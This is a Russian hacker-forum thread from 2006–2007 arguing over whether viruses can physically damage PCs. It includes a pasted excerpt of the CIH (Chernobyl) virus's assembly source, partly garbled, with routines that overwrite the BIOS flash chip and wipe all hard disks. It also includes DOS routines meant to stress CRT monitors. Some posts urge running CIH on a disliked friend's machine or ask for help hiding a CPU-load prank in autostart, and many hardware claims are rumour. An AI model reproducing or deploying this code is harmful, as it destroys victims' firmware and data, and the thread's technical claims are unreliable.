Просмотр полной версии : Спор:"Есть ли вири которые убивают железо"
Duke Nukem
20.05.2006, 01:46
Народ помогите разрешить спор - "Есть ли вири которые убивают железо"
В общем дело было так:
Я на учёбе, препод по О.С вызывает меня вещать про вирусы, я ему отвечаю и в конце он задаёт заключительный вопрос:
"Могут ли вирусы повредить аппаратную часть П.К" -
На что я ему ответил:"ДА Могут!!!"
Он усмехнулся....
И я ему обосновал, что стоит вирю получить доступ к BIOS и всё труба!!!!(К слову BIOS можно перепрошить чуть ли не через инет, и принцыпы построения практический одинаковые у всех фирм)
На что препод замолчал.....
Народ кто знает средства и алгоритмы воздействия на BIOS из под виндов, помогите уделать препода! :D
Про биос ты обсулютно прав.
Придет Elect -поможет;)
А вот те + на удачу.
Duke Nukem
20.05.2006, 01:53
Desr0w - RESPEKT и уважуха старшим!!!!!!!
Пасиба за одобрение!!!
Вири такие есть =]
Ну, самое банальный и яркий пример - это конечно винчих(или чернобыль), который 26 апреля(или когда там была катастрофа на АС, да простит меня мой ОБЖ-шник) перепрошивал биос в мусор.
Кстати, винчиха до сих пор можно найти в вирусовых залежах инета(чего там тока не валяеться!). Не думаю, что он будет работать на современных машинах, но 1-е, 2-е и 3-и пеньки и их атлоновские аналоги под ударом.
Конечно же, должно быть разрешение на запись в биос(в биосе настройка типа"Protect" или джампер на матери).
Ходили ещё байки, что некоторые модификации модернизировали прошивку и изменяли частоту системной шины на недопустимую, но по-моему это уже гон.
СД-РОМ.
Есть такая гадость, называеться Crazy_CD. Это чудо, будуче запущенным, начинает до бесконечности открывать\закрывать лоток СД, чем очень быстро портит пассик и остальную механику.
Ещё был вирь, разгоняющий блин в СД до космических скоростей. Болванка, разумеется, не выдерживала и разлеталась на n кусков. Отсюда самые разнообразные повреждения.
Ну, можно упомянуть жёсткий диск.
Впринципе, форматирование - это тоже порча железа, как и информации, его изменение. Но это вообще не интересно.
Кажется существует вирус, стирающий служебные секторы, при порче которых восстановить работоспособность можно лишь на заводе-производителе.
Была зараза, разбивающая жёсткий на n логических дисков, размером каждый по 1.4 Мгб. Я не знаю, байка или нет, но говрят, что при кол-ве логических разделов, превышающем 1024 происходит порча(!!!) оперативной памяти. Тип уязвимой памяти мне не изестен.
Darkwayder
20.05.2006, 10:17
Когда ещё юзали ещё win 98 то один паренёк решил замутить вирус под названием cih. наверно все слышали про него. Вообщем от него комп и сгорает.
Dumkopff
20.05.2006, 10:25
тут есть исходники CIH 1.4:
http://netch.ru/showthread.php?t=367
Darkwayder
20.05.2006, 10:33
На winXP не работает проверял :). А вот на 98 жёсть прямо. У кого есть win98, например у друга которого терпеть не можете, запустите cih, ставьте 26 апреля и через несколько дней вы будете долго ржать.
Может выложите сюды исходник Cih 1.4: регаться там влом
выложу тока часть, потому что он громадный
воть, самая безопасная часть этого вируса
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
IsKillComputer:
; Get Now Day from BIOS CMOS
mov ah. 07@HЄrr¦Ш¦$#ТA!М1r
Г2Р@EH`
аЕdr Ш"!BEAТЛ-1САНЪ!B H-ФhCi\ШGМАМРНДЩ-re¬(РВ$-
gHAr]!RЙ (ЙАDH$Й4гАф
lАЄЫ4¦'@-
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************
; ***************************
; * Kill BIOS EEPROM *
mov bp, 0cf8h
lea esi, IOForEEPROM-@7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
call esi
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
lea ebx, EnableEEPROMToWrite-@10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
mov ah, 0e0h
mov [eax], al
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; or al,10h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi
; * Kill All HardDisk *
; ************************************************** *
; * IOR Structure of IOS_SendCommand Needs *
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
Darkwayder
20.05.2006, 12:00
Мдя виг такой вирус напишешь. А воще вирь написан на асамблере?
Слышал о заразе, сжигающей проц.
Даже вроде знаю одного кодера, кто такое писал. ;)
Duke Nukem
20.05.2006, 22:11
Всем спасиба, кому не лень чиркайте сюда кто что знает, отдельное спасиба для Elekt !!!
Да я слышал про чернобыль, класный вирь :)
Был бы аналог этого чуда под современные П.К.
Ещё слышал про вирусы, которые увеличивают производительность системы примерно в два раза (каким только макаром), увеличивается оперативка, мощность видюхи, частота процессора и т.д.) Сначало владелец прыгает от счастья, его комп стал работать в два раза быстрее.. Но больше двух-трёх дней железо не выдерживает, и всё успешно летит к чертям:)
Есть вири даже для убивания здоровья человека... У меня уау то знакомый делал. Там спикер на какойто частоте начинал пищать. Его вроде не слышиш а слух твой охиренно садится... Ссори за оффтоп.
Cобственно говоря вирус может все, смотря какая задумка была кодера. Можно написать вирус который не только сжигает проц или винт, а убивает человека. Спросите как это возможно - элементарно. Например превышиная подача наприжения на монитор (с электронно-лучевой трубкой). Собственно я таких случаев не встречал, но теоретически это возможно(
DisturbeR
23.05.2006, 19:39
Большой вопрос считать ли программу BIOS аппаратной частью? По мне – все что можно записать, стереть, исправить – это программная часть, все остальное аппаратная. Все BIOS-вирусы стирают (изменяют, повреждают) ПРОГРАММУ, а не палят саму микросхему.
Кто-нибудь может назвать вирус, скрипт, программу которая может вызвать необратимую порчу процессора, памяти, материнской платы, видеокарты, жесткого диска, с учетом того что система охлаждается нормально. Я таких не знаю.
Превышения частоты, напряжения ничего не даст – система выпадет в даун. Единственная неоднозначная тема это – винт. Да и то тема на троечку.
Мое ИМХО: твой препод прав, ты нет. Единственное что ты можешь сделать, это провести исследование на тему: «Как быстро Crazy_CD, сотрет пассик CD-ROMa».
З.Ы. Е..ть мозги преподу, значит е..ть мозги себе. Задай вопрос: «А оно мне нужно?»
Cобственно говоря вирус может все, смотря какая задумка была кодера. Можно написать вирус который не только сжигает проц или винт, а убивает человека. Спросите как это возможно - элементарно. Например превышиная подача наприжения на монитор (с электронно-лучевой трубкой). Собственно я таких случаев не встречал, но теоретически это возможно(
Пипец, я уею... Ты что несёшь Вася? Ужос... Сколько ты заплатил за жёлтый цвет? =)
Для всех остальных интересующихся вирусами :)
Предлагаю пройти по этой ссылке и скачать книжку.
http://doci.nnm.ru/rulezzzzz/23.06.2006/zapiski_issledovatelya_kompyuternyh_virusov_3/
tclover - отжег!!! :DDD
Вобщем:
Слышал что на кулер можно посылать сигналы, которые будут следить за частотой вращения... (скоростью) представьте если поставить <2000? мой проц взлетит! =)
далее
на лучевую трубку действительно можно подействовать... Но это полностью аппаратный кодинг.
CD-ROM
ой... пользователь быстрее переустановит винду.. =) Но если нет, то все шестеренки нах сотруться =)
ПРОЦ:
собственно и на это можно подействовать (краем уха слышал что можно сжечь путем прерываний 21h что-ли?!)
Так! Отписываться в этом топике только после прочтения книжки, ссылку на которую я дал выше. А то несёте бред, чес слово....
раньше были вири которые стирали что-то в материнке и комп не загружался теперь такого нет =(
DimaHbl4
06.07.2006, 14:28
Теперь можно из под Винды замутить поднятие Fsb и если мать, не предназначена для оверклокинга то она тупо загнется. Знаю на личном опыте...
Rabid Rabbit
06.07.2006, 19:09
DimaHbl4, это какаято уникальная материнка да=) А воще на ноуте моно и из под винды замутить - запустить напр игрульку и фс6 поднимется=)
собственно и на это можно подействовать (краем уха слышал что можно сжечь путем прерываний 21h что-ли?!) краем уха, слышал, прерывание 21 (это которое ДОС) чтоли ГГГГГГГГ жжош))))
Например превышиная подача наприжения на монитор Ржунимагу
Кажется существует вирус, стирающий служебные секторы, при порче которых восстановить работоспособность можно лишь на заводе-производителе. в домашних условиях - низкоуровневым форматированием: сектора, дорожки, цилиндры, фактор чередования (или перекрытия) - это еще в те времена когда эти слова еще чтото означали реальное. Сейчас это просто виртуальные переменные, ничего общего с физическим положением считывающей головки на поверхности диска не имеющие. Ну а интерлив фактор остался только для дискет.
Была зараза, разбивающая жёсткий на n логических дисков, размером каждый по 1.4 Мгб. Я не знаю, байка или нет, но говрят, что при кол-ве логических разделов, превышающем 1024 происходит порча(!!!) оперативной памяти. Тип уязвимой памяти мне не изестен.Бугага))
ЗЫ ЭЛТ-Мониторы действительно можно накрыть но не все.
Эта пpоцедypа висела на int 8 (реальный режим) - она пpосто тpясет экpан.....
push dx
mov al,2
out 40h,al
mov al,3
out 40h,al
mov dx,3dah
in al,dx
mov dl,0c0h
mov al,33h
out dx,al
mov ax,word ptr cs:[offset _fd-100h]
out dx,al
add al,ah
test al,8
je _o08
not ah
add al,ah
_o08:
mov word ptr cs:[offset _fd-100h],ax
pop dx
_fd dw 0ffh
итд...
А вот дpyгая пpоцедypа, котоpая выполняется паpаллельно:
В общем MAIN procedure:
mov ax,40h
mov es,ax
_video_gluk:
mov dx,es:[63h]
in al,40h
out dx,al
mov dl,0c0h
out dx,al
mov dx,3b4h
xor al,ah
sub ah,al
out dx,ax
jmp _video_gluk
Главная сyть ясна, так что yлyчшайте, главное - не останавливаться на
достигнyтом.... Вышепpиведеные пpоцедypы пpовеpены, но Я не могy на 100%
yтвеpждать что y вас полyчится - на ваших видеокаpте и монитоpе. Тyт
зависит от пpоизводительности тачки (хотя непонятно, почемy, но - чем
быстpее, тем кpyче) и, видимо, от монитоpа... Кстати, те починенные
монитоpы все pавно как-то тоpмозят... В частности тоpмозное пеpеpyбление
pежимов и т.д. Видимо, хpеново чинят...;)
(c) Black Angel
Топик переполненный тупостью и бредом больше, чем любой другой на античате.... монитор сломать... мда...
DisturbeR
06.07.2006, 21:54
DimaHbl4, это какаято уникальная материнка да=) А воще на ноуте моно и из под винды замутить - запустить напр игрульку и фс6 поднимется=)
Уникальности здесь никакой нет. Даже на моих старых материнках 3-4 летней давности можно было из под винды не только повышать fsb, но и напряжение на на проц, agp и др. Поднятием fsb по опыту знаю спалить чего-нибудь трудно. У меня месяцами работали системы на полном максимуме, без побочных эффектов.
НО, на некоторых материнках существуют просто нереальные интервалы, в плане поднятия напряжения, завышенные многократно. Возможно, если выставить максимальные значения, чего нибудь и выйдет. Однако на себе не проверял, может система просто выпадет в даун… хз.
Rabid Rabbit
07.07.2006, 11:44
DisturbeR, уникальная в том смысле что палится таким макаром. вобщем это спорный вопрос. дешевые материнки бывает и просто так летят, от скачков напряжения напр (если БП плохо фильтрует). а вообще я никогда не сталкивался с такими материнками где это можно мутить изпод винды. у меня асусы постоянно и один раз солтек была. утилиты для работы с видюхой пользовал но это не одно и тоже. мне думается тут 2 варианта: или выпадет в даун или будут сбои. один раз из-за перегрева проца был случай на старой тачке (амдэха 100 пр 133) улетел диск Цэ (практически пошли вразнос ФАТы и БутРекорд, попортилось файло)
. Нашкодило здорово так.
DisturbeR
07.07.2006, 12:07
а вообще я никогда не сталкивался с такими материнками где это можно мутить изпод винды. у меня асусы постоянно и один раз солтек была. по идее изменения должны вступить после перезапуска?
Из тех что помню - Soltek SL-FRN3, на nForce-2 Ultra (под сокет А) – с помощью nForce_sys_util и Giga-Byte GA-PE800, на Intel i845PE (под 478 сокет) – c помощью Gigabyte_EasyTune4.
Перезагружаться не надо. Жмем кнопку, значения меняются на лету.
Кловер какой пароль на книгу Криса Касперски с nnm.ru ?
Собственно говоря, вы зря смеетесь, так как действительно есть вири которые портят железо. Неверите могу поспорить на деньги.
ArmageddonPro
07.07.2006, 18:36
Разработчики железа, наверное, тожа не дураки и уж постарались сделать всё возможное, чтобы железо нельзя было испортить.
Теоретически можно предположить, что проц можно убить! Но как это сделать? Фактически нужно просто заставить его перегреться, но как? Выключить вентилятор на процессоре, но мать тогда просто вырубит питание и мы обломаемся. Тогда нужно обмануть мать(сказав, что вентилятор работает на полную), но как это сделать не представляю себе возможным поскольку излишнее питание нужно куда-то девать. - Здесь облом полный. Может кто и раскажет. что-то другое
Хард: убить его не представляю себе возможным, но вот что-нить подпортить можно. Например, для чего проводиться дефрагментация все знают. А, что если мы поступим наоборот дефрагментации и будем дробить файлы, получая из них тысячи фрагментов на всём харде, - этим методом можно немного сократить жизнь харду поскольку считывающая головка будет усердно носиться по всей поверхности диска, причиняя себе физический износ, но долго ли? А нет, не долго, дело в том, что если мы так усердно начнём резать файлы в конечном итоге операционка начнёт грузиться очень и очень медленно и либо она сама произведёт дефрагментацию, либо её снесут и отформатируют жестак. - Вот и все старания и так же облом :p
ОЗУ: вообще никак не испортить :p
Видео, мать, сидюк: можно только подменить на официальном сайте прошивки к бивисам и тогда ликуй!!! Тоже можно восстановить! :rolleyes:
У кого другие мнения? :confused:
ArmageddonPro
07.07.2006, 18:42
Собственно говоря, вы зря смеетесь, так как действительно есть вири которые портят железо. Неверите могу поспорить на деньги.
Всё же я склонен считать, что, если они и портят, то уж не железо , а прошивку, которую можно восстановить, но не всегда.
Кловер какой пароль на книгу Криса Касперски с nnm.ru ?
На странице с которой ты скачивал книгу всё написано.
Верно, всё зависит от кол-ва денег в твоем кошеле и/или безбашенности/озлобленности кодера :)
Rabid Rabbit
10.07.2006, 10:11
Тогда нужно обмануть мать(сказав, что вентилятор работает на полную)Есть еще датчик температуры внутри проца.
Спалить копм поднятием fsb нельзя я на своей A-939(nf4) Ставил придельный шаг фсб менял на максимум HT и ставил макс напряжение максимум че происходило был даун системы и жуткий писк.
У меня еще можно из под виндуса уменьшать скорость вентиляторов вот это уже интересно я не разу с этим не баловался =) но фишка в том что скорость врашение можно поставить 0. Наводит на размышление =)
Я лично проверил вредоносное действие Win9x.CIH на старом i486 DX/2. После запуска комп сразу завис, ничего не помогало, оставался только резет. Что я и сделал =) Потом комп перестал грузиться с любого носителя, хоть и в биос заходишь и настройки меняешь, обнуление Cmos ничего не дало. То пищит что-то (после появления таблицы), то ироглифы пишет.
Вобщем хана матери, можно только программатором микросхему перепрошить в сервисе. =)
Так что могу точно сказать, что "Есть ли вири которые убивают железо", хоть он и прошивает софтовую часть, но мать то не работает, и комп не работает. А когда он не работает какая разница от чего: от софта или железа - один фиг ты на нем ничего не сделаешь. Если конечно не починишь, но это уже другая история.
Например превышиная подача наприжения на монитор (с электронно-лучевой трубкой). Собственно я таких случаев не встречал, но теоретически это возможно(
Напряжение использумое ЭЛТ не регулируется напрямую софтом, так что эта идея неосуществима.
У меня еще можно из под виндуса уменьшать скорость вентиляторов вот это уже интересно я не разу с этим не баловался =) но фишка в том что скорость врашение можно поставить 0. Наводит на размышление =)
Я думаю, что это предусмотрено разработчиками железа. Слышал фишку, что на Athlon'aх c сокетом А, при перегреве (достижении определенной критической температуры) проца, комп автоматом вырубается, так что если это так то спалить проц нереально
S|\/|eliyK()T
01.02.2007, 13:09
Интересная инфа..по поводу чернобыля.. тест всегда хорошо :)
А вот на дату топика иногда поглядывать всё-же стоило.....
Решил вставить свои 5 копеек :)
- Моник убить нынче не реально, его напруга не контралится софтово, раньше можно было задать высокую частотку и "спалить" моник, причем последствия были самые разные от пробива высокочастотных катушек и заканчивая перегараниями нитей накала кинескопа, сейчас от этого стоит защита и максимум, чего можно добиться - черный экран с надписью о привышении допустимой частоты, да, можно его задрочить переключениями частотки, и вероятно, рано или поздно это даст какой-либо эффект.
- BIOS. Безусловно и Gigabyte и Asus, да и пожалуй куча других производителей мамок пишут софт которым можно из вендов шить биос, менять на лету настройки железа и тд, но в современных мамках идет защита биоса от кривых рук, даже если ты туда прошьешь кусок mp3, комп все равно загрузится (увы, не всякий) и будет ждать либо флоп либо CD с корректной прошивкой, после чего содержимое BIOS с легкостью восстанавливается (проверено лично на Asus P4P800) А вот поднять питание процессора - можно. Неоднократно знакомые пытаясь разогнать что-то там, жгли проц.
- Кулер: Видел "необычную" реализацию "управления кулером", до 0 его остановить видимо нельзя, а вот сказать что у него 999999 об/мин, оказываеся можно ;) немного подумав, кулер отключался, но защита от перегрева не даст пойти дальше.
- Шина: Существуют разные мнения, но лично мне не разу не удавалось сжечь мамку поднятием частоты, теоретически - не отрицаю, знаю точно, что винты на некоторых мамках теряли инфу, были еденичные случаи когда затирась служебка, но это скорее исключение чем правило.
- Видяха: гнал свою 9800pro, греется, охерено греется, от системника пышет жаром, поставил нормальную продувку - до сих пор разогнана по максимале, на чипе больше 100градусов когда нагрузку даешь, не горит 2й год, хочется спросить "что я делаю не так?" ;)
- Флешка: угу, возможно и такое, флешка очень чувствительна к перезаписям, а если быть точным то к циклам записи, гипотетически ее можно "искуственно износить"
Кажется все сказал, если еще чего вспомню - допишу
UP:
Как доносят спутники - шпионы тут (http://www.nixp.ru/news/8757) описана проблема износа жесткого диска переходами в спящий режим и обратно
НоЧнОй МрАк
27.11.2007, 03:50
Итак дамы и господа прошу подсказать какие на данный момент есть вирусы реально портяшие тобиш выводящие из строя " железо " компьютера. Неважно что это будет- сам просессор, жосткий,монитор или видеокарта ) пишите про все вирусы такого рода))) очень надо...Лично я знаю из вирусов такого плана только 1 -Чернобыль но он некатит ибо оч стар и на 98 винду ток идет.. а ЩАС как вы знаете 98 в деревнях токо юзают :d
Винда тебе не даст запороть железо
to НоЧнОй МрАк:
///Прикольно было бы тебе , если б вирус в BIOS повысил cpu clock до максимума....
а лучше напряжение на всех частях компа....
потом загорается комп, далее по схеме, > занавеска> потолок> другая занавеска> стены>стол >другие стены>вся комната> ффся другая комната> фсе остальные комныты> все остальные квартиры.....///
неправда-ли МоЩнАаа!?!?!?!
Я понимаю маздай убить, но железо.... это же совсем другое дело!!!! Оно же денег стоит.....
Зачем такое???
Я бы не зделал такое даже моему самому ЁбНуТоМУУ врагу....!
А представь, что с тобой зделают, если узнают....твоё лечение(или похороны) будут стоить дороже даже, чем тот комп который ты убил....
ЗАБЕЙ НА ЭТО!
Из-За ТаКих КаК тЫЫ,,, МоЙйИИ ПреДкИИ сЧитАюТ, что ХаКеРаМ мМесТо В ТюрЬЬмЕ....!!!!
возможно всё....
а тем более в винде... :D
Elvis000
27.11.2007, 07:01
Правильнее сказать windows xp не даст запороть железо. Вспомните "Чернобыль" ТС о нем упоминал:
Вирус поражает исполняемые файлы Windows 95 и 98. После запуска зараженного файла вирус становится резидентом и заражает другие файлы этого компьютера при их копировании или открытии. Однако заражение - это еще не основной вред. "Взрыв Чернобыля" активизируется 26 апреля - у версий вируса 1.2 и 1.3. Более поздняя версия 1.4 срабатывает 26 числа каждого месяца.
кроме того, вирус пытается «обновить» флэш-BIOS материнской платы, после чего заражённый компьютер вообще перестает загружаться. Новый вариант "Чернобыля" получил индекс CIH.1106 и сохранил все основные особенности предшественника, хотя отличается несколько меньшей агрессивностью - перезапись BIOS он может лишь на платах с устаревшим чипсетом Intel 430TX для первого поколения процессоров Pentium. Наиболее уязвимы для CIH.1106 компьютеры под управлением операционных систем Windows 95, 98 и Me, при проникновении на которые вирус записывает свой код в неиспользуемые части EXE-файлов, практически не изменяя при этом их размера. В системах с Windows 2000, NT или XP вредоносная программа ведет себя несколько иначе, оставаясь в памяти резидентно и не инфицируя исполняемые файлы.
В Воронежа суд признал виновным студента одного из технических вузов Сергея Казачкова, создавшего компьютерный вирус "Чернобыль".
Как было установлено в ходе следствия, Казачков в целях умышленного распространения вредоносных компьютерных программ создал в российском сегменте Интернета два сайта, на которых разместил более четырех тысяч доступных для копирования опасных компьютерных вирусов, в том числе разрушительную программу "Чернобыль", которая уже причинила значительный ущерб пользователям ЭВМ во многих странах мира.
Суд назначил хакеру наказание в виде двух лет лишения свободы условно с испытательным сроком 1 год. Об этом сообщил начальник группы общественных связей управления ФСБ РФ по Воронежской области Павел Большунов, передает РИА Новости. от 2 мая 2006 г.
У нас в 1998 году все компы в институте встали, и дома у некоторых.
2 Francuz +1 возможно все.
НоЧнОй МрАк
27.11.2007, 07:31
Увожаемые хочу внести ясность я несобираюся никого испепилять или портить комуто железо! :d
Я лиш хочу узнать на данный момент есть ли такие вирусы и как они называються для собственной же безопастности и чтобы недай бог себе такого на комп непоймать!
НоЧнОй МрАк
27.11.2007, 07:35
to НоЧнОй МрАк:
///Прикольно было бы тебе , если б вирус в BIOS повысил cpu clock до максимума....
потом загорается комп, далее по схеме, > занавеска> потолок> другая занавеска> стены>стол >другие стены>вся комната> ффся другая комната> фсе остальные комныты> все остальные квартиры.....///
неправда-ли МоЩнАаа!?!?!?!
Я понимаю маздай убить, но железо.... это же совсем другое дело!!!! Оно же денег стоит.....
Зачем такое???
Я бы не зделал такое даже моему самому ЁбНуТоМУУ врагу....!
А представь, что с тобой зделают, если узнают....твоё лечение(или похороны) будут стоить дороже даже, чем тот комп который ты убил....
ЗАБЕЙ НА ЭТО!
Из-За ТаКих КаК тЫЫ,,, МоЙйИИ ПреДкИИ сЧитАюТ, что ХаКеРаМ мМесТо В ТюрЬЬмЕ....!!!!
Всё верно расписал респект но слишком уж ты загнул в прохую сторону.Не всё так страшно и опасно)
НоЧнОй МрАк
27.11.2007, 07:36
возможно есть на данный момент какието модификации чернобыля?
хм.. попробуй переделать какую нибудь оверклокерскую прогу для экстримального разгона ситсемы.. что бы работала в фоновом режиме и не палиась в процессе... тогда у компа есть все шансы сгореть... но думаю что это будет трудновато реализовать
Вово....
как я и писал.....
Да не сгорит ничего, если комп будет работать в нестандартных условиях (например с повышенной частотой), то после перегрева прост уйдет в ребут + при загрузке скорее всего будет ныть про оверклокинг. Старые компы может и спалишь, да и то не факт.
https://forum.antichat.ru/showthread.php?p=278542
gold-goblin
27.11.2007, 22:49
В принцыпе даже на vbs можно написать вирус ламающий комплектующие компьютера а имено лоток CD привода :) вы спросите как? да легко все время доставать его и какаенибуть блондинка начнет его использовать как подставку для кофе =)
to НоЧнОй МрАк:
...///Прикольно было бы тебе , если б вирус в BIOS повысил cpu clock до максимума....
потом загорается комп, далее по схеме, > занавеска> потолок> другая занавеска> стены>стол >другие стены>вся комната> ффся другая комната> фсе остальные комныты> все остальные квартиры.....///...
Это ж насколько надо напряжение повысить, чтобы комп "загорелся?"
Сейчас это невозможно.Новое железо очень разнится характеристиками и стандартами+на современных "мамках" очень грамотно реализована защита от перегрева и подобных факторов.Переписать или модифицоровать Bios так же практически нереально.А вот с жёстким диском можно ещё придумать.Можно по#ерить таблицу разделов и много ещё чего.Однако полностью "убить" железо всё же не получиться а доставить проблем рядовому юзеру-очень даже.
Есть прога прикол которая хорошо греет проц(моя). Она перезапускается при запуске и из нее не выйти через диспетчер задач. Писал на С#. Кстати можете мне помоч прописать ее в автозагрузку. Стучите в асю 868922
Греет процессор она только из-за того,что нагружает его.Запусти любой бенчмарк-тот же эффект будет.Тут всё зависит от охлаждения и самого процессора.Допустим новый Core 2 Duo или Атлон хорошо прогреет она очень даже вряд-ли.В аську стукну как освобожусь-сейчас занят,но не думай что этой прогой да ещё и в автозагрузке ты сделаешь хоть кому-нибудь хоть немного проблем :D
ground_zero
07.12.2007, 15:40
если найдёш гдето форточку 95-98 я тебе исходняки чернобыля подгоню =)))
xXvladXx
07.12.2007, 16:05
я помню гдето слышал что ддля ХР сп1 был вирь который останавливал веньтеляторы хотя он может и в сп2 работает но посли появления сп2 я о нем ничего не слышал
ground_zero
07.12.2007, 16:21
а да точно есть такой вирь могу подогнать пости на мыло =))))
называетса голова пьянова друга в системном блоке =)))
я помню гдето слышал что ддля ХР сп1 был вирь который останавливал веньтеляторы хотя он может и в сп2 работает но посли появления сп2 я о нем ничего не слышал
Запомни что в сплетни верить не стоит.Это физически невозможно.Далеко не все "вентиляторы(в народе их кулерами кличут кстати)" вообще зависят от чего либо кроме электричества:)Хотя чисто теоретически написать такой вирус возможно только смысла от него нуль так как он будет работать только с 1-2 материнками и встроенная защита будет тупо вырубать компьютер при нагреве до критической температуры.Хотя абсолютно уверен что такого вируса нет и не будет.
З.Ы.:Перед тем как что-нибудь написать проверяй информацию или ты посты набираешь?;)
Запомни что в сплетни верить не стоит.Это физически невозможно.
Ты бы и сам думал перед тем как писать :)
SpeedFan 4.33 - Утилита для контроля материнской платы - температура, напряжения, скорости вентиляторов, а также за температурой жестких дисков (если они поддерживают эту функцию). Крайне положительная черта SpeedFan, выделяющая эту программу среди аналогичных - умение изменять скорость вращения вентиляторов, в том числе в зависимости от температуры внутри системного блока.
http://www.almico.com/sfbetaprogram.php
Ты бы и сам думал перед тем как писать :)
http://www.almico.com/sfbetaprogram.php
да да да !А теперь скачай эту прекрасную программу и посмотри как она у тебя заработает!Этот софт пишется только под определённые материнки.На 5 компах где я её проверял-почему то не работала как ни странно.
Так что думай сам что писать:)
P.S: Такого вируса не было и нет.
gold-goblin
07.12.2007, 19:37
blaZe
Настраивать программку просто надо....
У меня она работает атлично.
blaZe
Настраивать программку просто надо....
У меня она работает атлично.
Я всё таки думаю что немножо неуместно разводить здесь флуд по такой ерунде и пытаться показать свою эрудированность в том или ином вопросе,не качающимся к теме.Дак вот,золотой гоблин,уж поверьте на этих компьютерах она не работала из-за того что поддержка их материнских плат не была сделана производителем.Руки у меня растут из того места откуда надо и едва-ли я знаю меньше вас в какой-либо области ИТ.Прежде чем писать такие самоуверенные коментарии в будующем задумайтесь...
gold-goblin
08.12.2007, 00:12
blaZe
Этот разговор косается темы обсуждаемой сдесь так как сдесь было описано ПО которое останавливало кулера на компьютере.
А программка спеед фан кокрас это может сделать. Если она не поддерживала твои компы это не значит что все. Сейчас эта программка поддерживает самые популярные материнки....
blaZe
Этот разговор косается темы обсуждаемой сдесь так как сдесь было описано ПО которое останавливало кулера на компьютере.
А программка спеед фан кокрас это может сделать. Если она не поддерживала твои компы это не значит что все. Сейчас эта программка поддерживает самые популярные материнки....
Здесь обсуждался вирус который это делает.Бесспорно Partition Magic умеет форматировать разделы как и некоторые вирусы,однако здесь несколько иной случай.
Во-первых такой вирус весил бы неимоверно много,так как писать подобного рода ПО под один вид материнских плат по крайней мере глупо.
Во-вторых суть моих претензий к тебе состояла в том что не стоит упрекать человека в том что он не может настроить какое-либо ПО,абсолютно не зная этого человека либо не до конца разбираясь в совместимости самой программы.
Ну и в-третьих "останавливающий кулеры вирус" бесполезен по трём причинам:
1)Узкий спектр "жертв"
2)А смысл вырубать кулеры?:)На современных материнках сработает защита,а на старых такой метод не прокатит.
3)Вирус будет вести себя как зажравшийся хряк в период размножения.Он будет безобразно весить и не особо быстро работать.
::Сообщение от Francuz
to НоЧнОй МрАк:
...///Прикольно было бы тебе , если б вирус в BIOS повысил cpu clock до максимума....
потом загорается комп, далее по схеме, > занавеска> потолок> другая занавеска> стены>стол >другие стены>вся комната> ффся другая комната> фсе остальные комныты> все остальные квартиры.....///...
\\
//
Это ж насколько надо напряжение повысить, чтобы комп "загорелся?"
конечно это юмор такой, но в каждой шутке, есть доля шутки, остальное правда!::
Exclusive
11.12.2007, 08:05
Думаю не трудно создать вирус который бы менял частоту и разрешение монитора на оч. высокие.
и только блондинка бы этого испугалась!
ведь моник не згорит!
Все теперешнее железо просто имеет защиту от перегрева и т.п.
Я думаю такой вирь написать маловозможно
ZavodiJIo
19.12.2007, 21:41
Stalk слуш, читай полностью весь топ прежде чем что-то написать... Реал задолбали набивать посты на пустом месте....
0)ArmageddonPro
Разработчики железа, наверное, тожа не дураки и уж постарались сделать всё возможное, чтобы железо нельзя было испортить.Разработчики софта, наверное, тожа не дураки и уж постарались сделать всё возможное, чтобы софт нельзя было взломать. ;) (Кто не понял шутка, но с намёком)
1) x0x01 - на счет ЭЛТ монитора и превышения частоты - знаю что мониторам очень вредно работать на запредельных частотах (мой старый 75 рекомендовано, но на ужасно малом разрешении работал и при 120 Гц и при этом свител как черт знает что) Думаю что не обязательно выставлять запредельные частоты, а ставить максимально возможные при которых они еще могут работать. (если не менять разрешения то пользователи и не заметят) Слышал как один хвалился что он какой-то прогой "разогнал" монитор на 1Гц. (Правда | не правда не знаю, но, если правда то срк жизни монитора можно уменьшить в разы или десятки :))
